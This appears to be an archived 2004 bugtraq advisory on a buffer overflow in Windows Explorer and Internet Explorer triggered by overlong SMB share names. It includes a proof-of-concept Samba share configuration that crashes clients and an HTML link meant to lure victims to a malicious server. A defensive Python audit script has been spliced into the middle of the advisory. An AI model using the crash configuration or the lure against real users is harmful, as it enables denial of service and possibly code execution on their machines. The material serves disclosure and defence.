[34662] in bugtraq
Microsoft's Explorer and Internet Explorer long share name buffer overflow.
daemon@ATHENA.MIT.EDU (Rodrigo Gutierrez)
Mon Apr 26 12:49:39 2004
From: "Rodrigo Gutierrez" <rodrigo@intellicomp.cl>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>,
<submissions@packetstormsecurity.org>, <info@securiteam.com>
Date: Sun, 25 Apr 2004 17:38:24 -0400
Message-Id: <20040425213223.7647A4077@etrn.gtdinternet.com>
Sunday afternoon is a bit boring, and the weather sucks down here in Santiago,
Chile, so here we go...
The vuln is attached in TXT format. I would be grateful if someone could
verify whether it affects Windows 2003 as well.
Rodrigo.-
Attachment: explorer-vuln.txt
Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.
Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
Affected: MS Internet Explorer, MS Explorer (explorer.exe)
Windows XP (all), Windows 2000 (all)
Not Tested: Windows 2003, Windows Me, Windows 98, Windows 95
Vendor Status: I notified the vendor at the beginning of 2002; this
vulnerability was supposed to be fixed in XP Service Pack 1 according to
the vendor's Knowledge Base article 322857.
Vendor URL: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
Background
MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are
core pieces of the Microsoft Windows operating systems.
Description
Windows fails to handle long share names when accessing remote file
servers such as Samba, allowing a malicious server to crash the client's
Explorer and possibly execute arbitrary code on the machine as the current
user (usually with Administrator rights on Windows machines).
Analysis
In order to exploit this, an attacker must be able to get a user to connect
to a malicious server that contains a share name of 300 characters or more.
Windows won't allow you to create such a share, but of course Samba
includes the feature ;). Once your Samba box is up and running, create a
share in your smb.conf:
#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
#------------ CUT HERE -------------
Once your server is up, just go to your Windows test box and enter
\\your.malicious.server.ip in Start menu > Run. Plufff, Explorer will
crash :).
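The practical defensive check that follows from the above is on the server side: a Samba administrator can audit smb.conf for share names that no Windows client expects to see. The script below is an added example, not part of the advisory and not Samba's own tooling. It parses the share sections of an smb.conf with a small hand-written reader (assumed sufficient for ordinary configs; it ignores include directives and variable substitution), and flags any share name longer than 80 characters, which is assumed here to be the limit Windows itself enforces when creating a share, escalating to "crash" at the 300-character threshold the advisory reports. The embedded configuration is constructed sample input.

```python
import re
from typing import Dict, List, Tuple

# Assumed limit: Windows refuses to create share names longer than 80 characters.
# The advisory only says Windows "won't allow" such shares, so treat this as a
# configurable threshold rather than a fact stated on the page.
WINDOWS_MAX_SHARE_NAME = 80
# Length at which the advisory reports the Explorer crash.
ADVISORY_CRASH_LENGTH = 300

_SECTION_RE = re.compile(r"^\[(?P<name>[^\]]*)\]$")
_KEYVAL_RE = re.compile(r"^(?P<key>[^=]+?)\s*=\s*(?P<val>.*)$")


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf reader returning {section_name: {key: value}}.

    Handles '#' and ';' comment lines and blank lines. Keys are lower-cased
    so 'Write List' and 'write list' collide as Samba treats them. Hypothetical
    helper: it does not implement 'include' or '%' variable substitution.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION_RE.match(line)
        if m:
            current = m.group("name").strip()
            sections.setdefault(current, {})
            continue
        m = _KEYVAL_RE.match(line)
        if m and current is not None:
            sections[current][m.group("key").strip().lower()] = m.group("val").strip()
    return sections


def audit_share_names(text: str, limit: int = WINDOWS_MAX_SHARE_NAME) -> List[Tuple[str, int, str]]:
    """Return (share_name, length, severity) for every share whose name exceeds `limit`.

    Severity is 'crash' once the name reaches the advisory's 300-character
    threshold and 'warn' for anything merely longer than a Windows client
    could have created itself. [global] is configuration, not a share.
    """
    findings: List[Tuple[str, int, str]] = []
    for name in parse_smb_conf(text):
        if name.lower() == "global":
            continue
        n = len(name)
        if n > limit:
            severity = "crash" if n >= ADVISORY_CRASH_LENGTH else "warn"
            findings.append((name, n, severity))
    return findings


# Constructed sample smb.conf: one sane share, one oversized name, and one
# that matches the advisory's 300-character crash case.
SAMPLE_SMB_CONF = "\n".join([
    "[global]",
    "   workgroup = TESTLAB",
    "; a normal share",
    "[public]",
    "   path = /srv/public",
    "   browseable = yes",
    "[" + "A" * 120 + "]",
    "   path = /tmp/testfolder",
    "   public = yes",
    "[" + "B" * 300 + "]",
    "   comment = Area 51",
    "   path = /tmp/testfolder",
    "   write list = @trymywingchung",
])


if __name__ == "__main__":
    for name, length, severity in audit_share_names(SAMPLE_SMB_CONF):
        print(f"{severity.upper():5} share name of {length} chars: {name[:20]}...")
```

Run it against a real file with `audit_share_names(open("/etc/samba/smb.conf").read())`; a clean config returns an empty list, and anything flagged "crash" is a share that unpatched Windows 2000/XP clients described in this advisory cannot safely browse.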
Social Engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>
Workaround
From your network card settings, disable the Client for Microsoft Networks
until a real fix for this vulnerability is available.